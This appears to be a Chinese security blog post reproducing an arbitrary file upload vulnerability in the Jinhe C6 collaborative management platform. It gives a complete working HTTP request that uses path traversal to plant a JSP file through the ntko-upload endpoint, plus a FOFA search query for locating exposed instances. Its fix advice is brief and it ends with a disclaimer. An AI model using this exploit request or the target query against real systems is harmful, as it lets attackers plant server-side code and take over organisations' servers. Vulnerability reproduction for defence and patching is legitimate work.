【复现】金和 jc6协同管理平台 任意文件上传漏洞(2)_21

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

四.修复建议:

五. 搜索语法:

六.免责声明


一.概述

金和C6协同管理平台包括协同办公管理,人力资源管理,项目管理,客户关系管理,企业目标管理,费用管理,移动办公,微信办公等多个业务范围.基于SOA插件式的整合平台、灵活的工作流程引擎、强大的自定义表单工具、良好的系统开放性、灵活多样的部署方式,支持集团化企业应用、外部组件标准集成接口、支持移动客户端应用体验

二 .漏洞影响

        上传文件漏洞的影响可能会非常严重,包括以下几个方面: 服务器被入侵:上传可执行代码可能让攻击者获得服务器控制权。 数据泄露:攻击者可能会上传恶意工具来窃取或篡改数据。 分布式拒绝服务(DDoS)攻击:攻击者可以上传大量恶意文件,导致服务器资源被消耗殆尽,从而导致正常的服务无法使用,对用户体验和业务连续性造成严重影响。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  文件上传

(2)请求类型:POST

(3)复现

访问网站首页抓包

【复现】金和 jc6协同管理平台 任意文件上传漏洞(2)_21_第1张图片


修改漏洞地址并访问,响应200

【复现】金和 jc6协同管理平台 任意文件上传漏洞(2)_21_第2张图片

访问 /upload/上传的文件名  可以看到成功上传

【复现】金和 jc6协同管理平台 任意文件上传漏洞(2)_21_第3张图片


请求包

POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Length: 436

------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="filename"

../../../../upload/test.jsp
------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="upLoadFile"; filename="test.jpg"
Content-Type: image/jpeg

<% out.println("test111"); %>
------WebKitFormBoundary5iALAXlSiqxJXrhK
Content-Disposition: form-data; name="Submit"

upload
------WebKitFormBoundary5iALAXlSiqxJXrhK--

关于其他金和文件上传漏洞

【复现】金和OA协同管理平台 任意文件上传漏洞_20-CSDN博客

四.修复建议:

文件大小的限制,隐藏上传文件路径,病毒扫描等

五. 搜索语法:

1.fofa

app="金和网络-金和OA"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

你可能感兴趣的:(安全漏洞,安全,web安全,网络安全,系统安全)